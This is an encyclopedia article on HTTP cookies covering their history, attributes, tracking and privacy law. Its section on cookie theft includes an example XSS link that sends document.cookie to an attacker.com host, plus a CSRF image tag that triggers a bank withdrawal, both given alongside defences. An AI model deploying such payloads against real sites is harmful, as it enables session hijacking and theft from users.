- HTTP cookie
-
HTTP Persistence · Compression · HTTPS Request methods OPTIONS · GET · HEAD · POST · PUT · DELETE · TRACE · CONNECT Header fields Cookie · ETag · Location · Referer DNT · X-Forwarded-For Status codes 301 Moved permanently 302 Found 303 See Other 403 Forbidden 404 Not Found A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user's browser and for the browser to return the state information to the origin site.[1] The state information can be used for authentication, identification of a user session, user's preferences, shopping cart contents, or anything else that can be accomplished through storing text data on the user's computer.
Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer.[2] However, they can be used by spyware to track user's browsing activities – a major privacy concern that prompted European and US law makers to take action.[3][4] Cookies can also be stolen by hackers to gain access to a victim's web account.[5]
Contents
History
The term "cookie" was derived from "magic cookie", which is the packet of data a program receives and sends again unchanged. Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in Web communications in June 1994.[6] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[7][8]
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[9][10] supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and US 5774670 was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.[11]
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. The general public learned about them after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf and David Kristol respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
A definitive specification for cookies as used in the real world was published as RFC 6265 in April 2011.
Terminologies
Session cookie
A session cookie[12] only lasts for the duration of users using the website. A web browser normally deletes session cookies when it quits. A session cookie is created when no Expires directive is provided when the cookie is created.
Persistent cookie
A persistent cookie[12] will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies or in-memory cookies.
Secure cookie
A secure cookie is only used when a browser is visiting a server via HTTPS, ensuring that the cookie is always encrypted when transmitting from client to server. This makes the cookie less likely to be exposed to cookie theft via eavesdropping.
HttpOnly cookie
The HttpOnly cookie is supported by most modern browsers.[13][14] On a supported browser, an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests, thus restricting access from other, non-HTTP APIs (such as JavaScript). This restriction mitigates but does not eliminate the threat of session cookie theft via Cross-site scripting.[15] This feature applies only to session-management cookies, and not other browser cookies.
Third-party cookie
First-party cookies are cookies set with the same domain (or its subdomain) in your browser's address bar. Third-party cookies are cookies being set with different domains than the one shown on the address bar (i.e. the web pages on that domain may feature content from a third-party domain - e.g. an advertisement run by www.advexample.com showing advert banners).
For example: Suppose a user visits
www.example1.com
, which sets a cookie with the domainad.foxytracking.com
. When the user later visitswww.example2.com
, another cookie is set with the domainad.foxytracking.com
. Eventually, both of these cookies will be sent to the advertiser when loading their ads or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites this advertiser has footprints on.Supercookie
A "supercookie" is a cookie with a public suffix domain, like
.com
,.co.uk
ork12.ca.us
.[16]Most browsers, by default, allow first-party cookies—a cookie with domain to be the same or sub-domain of the requesting host. For example, a user visiting
www.example.com
can have a cookie set with domainwww.example.com
or.example.com
, but not.com
.[17] A supercookie with domain.com
would be blocked by browsers; otherwise, a malicious website, likeattacker.com
, could set a supercookie with domain.com
and potentially disrupt or impersonate legitimate user requests toexample.com
. The Public Suffix List is a cross-vendor initiative to provide an accurate list of domain name suffixes changing.[18] Older versions of browsers may not have the most up-to-date list, and will therefore be vulnerable to certain supercookies.The term "supercookies" is erroneously used in the media for tracking technologies that do not rely on HTTP cookies. Two such "supercookie" mechanisms were found on Microsoft websites: cookie syncing that respawned MUID cookies, and ETag cookies.[19] Due to media attention, Microsoft later disabled this code:
In response to recent attention on "supercookies" in the media, we wanted to share more detail on the immediate action we took to address this issue, as well as affirm our commitment to the privacy of our customers. According to researchers, including Jonathan Mayer at Stanford University, "supercookies" are capable of re-creating users' cookies or other identifiers after people deleted regular cookies. Mr. Mayer identified Microsoft as one among others that had this code, and when he brought his findings to our attention we promptly investigated. We determined that the cookie behavior he observed was occurring under certain circumstances as a result of older code that was used only on our own sites, and was already scheduled to be discontinued. We accelerated this process and quickly disabled this code. At no time did this functionality cause Microsoft cookie identifiers or data associated with those identifiers to be shared outside of Microsoft.—Mike Hintze[20]Zombie cookie
Main article: Zombie cookieA zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other locations, such as the local storage available to Flash content, HTML5 storages and other client side mechanisms, and then recreating the cookie from backup stores when the cookie's absence is detected.
Uses
Session management
Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"),[7][8] a virtual device into which users can store items they want to purchase as they navigate throughout the site.
Shopping basket applications today usually store the list of basket contents in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier.
Allowing users to log in to a website is a frequent use of cookies. Typically the web server will first send a cookie containing a unique session identifier. Users then submit their credentials and the web application authenticates the session and allows the user access to services.
Personalization
Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.
Many websites use cookies for personalization based on users' preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalize the page according to the user preferences. For example, the Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine allows users (even non-registered ones) to decide how many search results per page they want to see.
Tracking
Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:
- If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
- From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence.
Implementation
Cookies are arbitrary pieces of data chosen by the Web server and sent to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web page or component of a Web page is an isolated event, mostly unrelated to all other views of the pages of the same site. Other than being set by a web server, cookies can also be set by a script in a language such as JavaScript, if supported and enabled by the Web browser.
Cookie specifications[14][21][22] suggest that browsers should be able to save and send back a minimal number of cookies. In particular, a web browser is expected to be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain.
Setting a cookie
Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request. For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one:
GET /index.html HTTP/1.1
Host: www.example.org
browser -------→ server The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
Set-Cookie: name2=value2; Expires=Wed, 09 Jun 2021 10:18:14 GMT
(content of page)browser ←------- server The server sends lines of
Set-Cookie
only if the server wishes the browser to store cookies.Set-Cookie
is a directive for the browser to store the cookie and send it back in future requests to the server (subject to expiration time or other cookie attributes), if the browser supports cookies and cookies are enabled. For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following:GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value; name2=value2
Accept: */*
browser -------→ server This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.
The value of a cookie can be modified by the server by sending a new
Set-Cookie: name=newvalue
line in response of a page request. The browser then replaces the old value with the new one.The term "cookie crumb" is sometimes used to refer to the name-value pair.[23] This is not the same as breadcrumb web navigation, which is the technique of showing in each page the list of pages the user has previously visited; this technique, however, may be implemented using cookies.
Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object
document.cookie
is used for this purpose. For example, the instructiondocument.cookie = "temperature=20"
creates a cookie of nametemperature
and value20
.[24]Cookie attributes
Besides the name-value pair, servers can also set these cookie attributes: a cookie domain, a path, expiration time or maximum age, secure flag and httponly flag. Browsers will not send cookie attributes back to the server. They will only send the cookie’s name-value pair. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie (name-value pair) to the servers.
Domain and Path
The cookie domain and path define the scope of the cookie—they tell the browser that cookies should only be sent back to the server for the given domain and path. If not specified, they default to the domain and path of the object that was requested. An example of Set-Cookie directives from a website after a user logged in:
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly
......The first cookie
LSID
has default domaindocs.foo.com
and Path/accounts
, which tells the browser to use the cookie only when requesting pages contained indocs.foo.com/accounts
. The other 2 cookiesHSID
andSSID
would be sent back by the browser while requesting any subdomain in.foo.com
on any path, for examplewww.foo.com/
.Cookies can be set on only top domain and its sub domains. Setting cookies on
www.foo.com
fromwww.bar.com
will not work for security reasons.[25]Expires and Max-Age
The Expires directive tells the browser when to delete the cookie. It is specified in the form of “Wdy, DD-Mon-YYYY HH:MM:SS GMT”, indicating the exact date/time this cookie will expire. As an alternative to setting cookie expiration as an absolute date/time, RFC 6265 allows the use of the Max-Age attribute to set the cookie’s expiration as an interval of seconds in the future, relative to the time the browser received the cookie. An example of Set-Cookie directives from a website after a user logged in:
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15-Jan-2013 21:47:38 GMT; Path=/; Domain=.foo.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.foo.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01-Jan-1970 00:00:01 GMT; Path=/; Domain=.foo.com; HttpOnly
......The first cookie
lu
is set to expire sometime in 15-Jan-2013; it will be used by the client browser until that time. The second cookiemade_write_conn
does not have an expiration date, making it a session cookie. It will be deleted after the user closes his/her browser. The third cookiereg_fb_gate
has its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away – note that cookie will only be deleted when the domain and path attributes in theSet-Cookie
field match the values used when the cookie was created.Secure and HttpOnly
The Secure and HttpOnly attributes do not have associated values. Rather, the presence of the attribute names indicates that the Secure and HttpOnly behaviors are specified.
The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. Naturally, web servers should set Secure cookies via secure/encrypted connections, lest the cookie information be transmitted in a way that allows eavesdropping when first sent to the web browser.
The HttpOnly attribute directs browsers to use cookies via the HTTP protocol only. An HttpOnly cookie is not accessible via non-HTTP methods, such as calls via JavaScript (e.g., referencing "document.cookie"), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique[26]). As shown in previous examples, both Facebook and Google use the HttpOnly attribute extensively.
Browser settings
Most modern browsers support cookies and allow the user to disable them. The following are common options:[27]
- To enable or disable cookies completely, so that they are always accepted or always blocked.
- To allow the user to see the cookies that are active with respect to a given page by typing
javascript:alert(document.cookie)
in the browser URL field. Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser. - By default, Internet Explorer allows only third-party cookies that are accompanied by a P3P "CP" (Compact Policy) field.[28]
Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.[29][30][31][32]
Privacy and third-party cookies
Cookies have some important implications on the privacy and anonymity of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain, a Web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. The standards for cookies, RFC 2109 and RFC 2965, specify that browsers should protect user privacy and not allow third-party cookies by default. But most browsers, such as Mozilla Firefox, Internet Explorer, Opera and Google Chrome do allow third-party cookies by default, as long as the third-party website has Compact Privacy Policy published.
Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.[33]
The possibility of building a profile of users is considered by some a potential privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers which had visited its web site. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them.[34] On December 25, 2005, Brandt discovered that the National Security Agency had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the National Security Agency immediately disabled the cookies.[35]
The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies.[36] In particular, Article 5, Paragraph 3 of this directive mandates that storing data (like cookies) in a user's computer can only be done if:
- the user is provided information about how this data is used;
- the user is given the possibility of denying this storing operation. However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.
The P3P specification includes the possibility for a server to state a privacy policy, which specifies which kind of information it collects and for which purpose. These policies include (but are not limited to) the use of information gathered using cookies. According to the P3P specification, a browser can accept or reject cookies by comparing the privacy policy with the stored user preferences or ask the user, presenting them the privacy policy as declared by the server.
Many web browsers including Apple's Safari and Microsoft Internet Explorer versions 6 and 7 support P3P which allows the web browser to determine whether to allow third-party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains.[37] Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.[38]
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's Web experience.[39] Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[40]
Cookie theft and session hijacking
Most web sites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a web site uses cookies as session identifiers, attackers can impersonate users’ requests by stealing a full set of victims’ cookies. From the web server's point of view, a request from an attacker has the same authentication as the victim’s requests; thus the request is performed on behalf of the victim’s session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) which work with web sites which rely solely on HTTP cookies for user identification.
Network eavesdropping
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim’s bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as an SSL connection.[14]
Publishing false sub-domain – DNS cache poisoning
Via DNS cache poisoning, an attacker might be able to cause a DNS server to cache a fabricated DNS entry, say
f12345.www.example.com
with the attacker’s server IP address. The attacker can then post an image URL from his own server (for example,http://f12345.www.example.com/img_4_cookie.jpg
). Victims reading the attacker’s message would download this image fromf12345.www.example.com
. Sincef12345.www.example.com
is a sub-domain ofwww.example.com
, victims’ browsers would submit allexample.com
-related cookies to the attacker’s server; the compromised cookies would also include HttpOnly cookies.[clarification needed]This vulnerability is usually for Internet Service Providers to fix, by securing their DNS servers. But it can also be mitigated if
www.example.com
is using Secure cookies. Victims’ browsers will not submit Secure cookies if the attacker’s image is not using encrypted connections. If the attacker chose to use HTTPS for his img_4_cookie.jpg download, he would have the challenge[41] of obtaining an SSL certificate forf12345.www.example.com
from a Certificate Authority. Without a proper SSL certificate, victims’ browsers would display (usually very visible) warning messages about the invalid certificate, thus alerting victims as well as security officials fromwww.example.com
.Cross-site scripting – cookie theft
Scripting languages such as JavaScript and JScript are usually allowed to access cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. These facts are used in combination with sites allowing users to post HTML content that other users can see.
As an example, an attacker may post a message on
www.example.com
with the following link:<a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;"> Click here!</a>
When another user clicks on this link, the browser executes the piece of code within the
onclick
attribute, thus replacing the stringdocument.cookie
with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to theattacker.com
server. If the attacker’s posting is onhttps://www.example.com/somewhere
, secure cookies will also be sent to attacker.com in plain text.Cross-site scripting is a constant threat, as there are always some crackers trying to find a way of slipping in script tags to websites. It is the responsibility of the website developers to filter out such malicious code.
In the meantime, such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client side script, and therefore the attacker will not be able to gather these cookies.
Cross-site scripting
If an attacker was able to insert a piece of script to a page on
www.example.com
, and a victim’s browser was able to execute the script, the script could simply carry out the attack. This attack would use victim’s browser to send HTTP requests to servers directly; therefore, the victim’s browser would submit all relevant cookies, including HttpOnly cookies, as well as Secure cookies if the script request is on HTTPS.For example, on MySpace, Samy posted a short message “Samy is my hero” on his profile, with a hidden script to send Samy a “friend request” and then post the same message on the victim’s profile. A user reading Samy’s profile would send Samy a “friend request” and post the same message on this person’s profile. Then, the third person reading the second person’s profile would do the same. Pretty soon, this Samy worm became one of the fastest spreading viruses of all time.
This type of attack (with automated scripts) would not work if a website had CAPTCHA to challenge client requests.
Cross-site scripting – proxy request
In older version of browsers, there were security holes allowing attackers to script a proxy request by using XMLHttpRequest. For example, a victim is reading an attacker’s posting on
www.example.com
, and the attacker’s script is executed in the victim’s browser. The script generates a request towww.example.com
with the proxy serverattacker.com
. Since the request is forwww.example.com
, allexample.com
cookies will be sent along with the request, but routed through the attacker’s proxy server, hence, the attacker can harvest victim’s cookies.This attack would not work for Secure cookie, since Secure cookies go with HTTPS connections, and its protocol dictates end-to-end encryption, i.e., the information is encrypted on the user’s browser and decrypted on the destination server
www.example.com
, so the proxy servers would only see encrypted bits and bytes.Cross-site Request Forgery
Main article: Cross-site request forgeryFor example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Drawbacks of cookies
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.[42][43]
Inaccurate identification
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Inconsistent state on client and server
The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is built using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations.
Alternatives to cookies
Some of the operations that can be done using cookies can also be done using other mechanisms.
IP address
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser or the proxy, if any is used, and could theoretically link a users session to this IP address. However, these addresses are not reliable in identifying a user because computers and proxies are very often shared by several users.
Some systems such as Tor are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.
URL (query string)
A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.
Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. For example, if the same user arrives to the same page but coming from a page internal to the site the first time and from an external search engine the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string.
Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation attacks, referrer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example).
This method can be easily used with any framework that supports web forms.
window.name
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables[44] on the client side.
The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy.
In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to network cookie sniffing attacks. However if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.
HTTP authentication
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
See also
- Dynamic HTML
- Evercookie
- Local Shared Object – Flash Cookies
- Session Beans
- Session (computer science)
- Session ID
- Web server session management
- Web Storage and DOM Storage
- Web visitor tracking
- Zombie cookie
References
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- ^ a b c IETF HTTP State Management Mechanism – Apr, 2011 Obsoletes RFC 2965.
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- ^ "Persistent client state HTTP cookies: Preliminary specification". Netscape. c1999. Archived from the original on 2007-08-05. http://web.archive.org/web/20070805052634/http://wp.netscape.com/newsref/std/cookie_spec.html.
- ^ RFC 2965 – HTTP State Management Mechanism (IETF)
- ^ "Cookie Property". MSDN. Microsoft. http://msdn2.microsoft.com/en-us/library/ms533693.aspx. Retrieved 2009-01-04.
- ^ Shannon, Ross (2007-02-26). "Cookies — set and retrieve information about your readers". HTMLSource. http://www.yourhtmlsource.com/javascript/cookies.html. Retrieved 2009-01-04.
- ^ Innovative, Php (2011-09-02). "Sharing Cookies Between Multiple Domains". InnovativePhp.. http://www.innovativephp.com/sharing-cookies-across-multiple-domains-hosted-on-different-servers/. Retrieved 2011-09-02.
- ^ (PDF) Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary). XIII. Symantec Corp.. April 2008. pp. 1–3. http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf. Retrieved May 11, 2008.
- ^ Whalen, David (June 8, 2002). "The Unofficial Cookie FAQ v2.6". Cookie Central. http://www.cookiecentral.com/faq/. Retrieved 2009-01-04.
- ^ "3rd-Party Cookies, DOM Storage and Privacy". grack.com: Matt Mastracci's blog. January 6, 2010. http://grack.com/blog/2010/01/06/3rd-party-cookies-dom-storage-and-privacy/. Retrieved 2010-09-20.
- ^ "How to Manage Cookies in Internet Explorer 6". Microsoft. December 18, 2007. http://support.microsoft.com/kb/283185. Retrieved 2009-01-04.
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- ^ Mozilla AddOns, TACO, the Targeted Advertising Cookie Opt-Out Firefox extension
- ^ Wired Hack Obtains 9 Bogus Certificates for Prominent Websites
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This article was originally based on material from the Free On-line Dictionary of Computing, which is licensed under the GFDL.
External links
Listen to this article (info/dl)
This audio file was created from a revision of HTTP cookie dated 2011-10-19, and does not reflect subsequent edits to the article. (Audio help)More spoken articles- RFC 6265 – the official specification for HTTP cookies
- How Internet Cookies Work at HowStuffWorks
- Information About Cookies from Microsoft
- Cookies at the Electronic Privacy Information Center (EPIC)
- Taking the Byte Out of Cookies: Privacy, Consent, and the Web (PDF)
- Web handbook – Cookies from Delivery And Transformation Group, Cabinet Office, UK
- Cookie-Based Counting Overstates Size of Web Site Audiences at ComScore
- Don’t Tread on Our Cookies – The Web Privacy Manifesto at PBS
- Mozilla Knowledgebase: Cookies
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